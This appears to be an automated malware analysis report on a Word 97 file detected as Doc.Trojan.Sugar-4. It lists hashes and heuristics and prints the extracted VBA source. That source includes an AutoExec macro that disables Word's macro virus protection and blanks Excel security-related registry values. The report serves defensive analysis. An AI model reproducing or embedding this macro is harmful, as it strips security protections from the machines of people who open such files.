Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c5aff15e9a662d5c…

MALICIOUS

Office (OLE)

36.0 KB Created: 1999-01-01 14:29:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 7a7ac098a932323f61342519e0e93262 SHA-1: 8c38846bd2e70f7fefe757a9bed5fd25b60d9c7d SHA-256: c5aff15e9a662d5ce27e2995061f06fa8b6deb954145bc3833b8ad39b7aa4ab1
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature Doc.Trojan.Sugar-4. It contains VBA macros that, when executed, attempt to disable macro virus protection and modify Excel settings. The AutoExec subroutine explicitly targets registry keys related to Excel options, suggesting an intent to prepare the system for subsequent malicious actions or to evade detection.

Heuristics 2

  • ClamAV: Doc.Trojan.Sugar-4 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Sugar-4
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 632 bytes
SHA-256: 37c7478d3f552eafe278b11d9624d70011ff7d7f8c020396ea99b9b8866bcbf4
Detection
ClamAV: Doc.Trojan.Sugar-4
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AutoExec() 'Vic
System.ProfileString("Options", "EnableMacroVirusProtection") = "0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
End Sub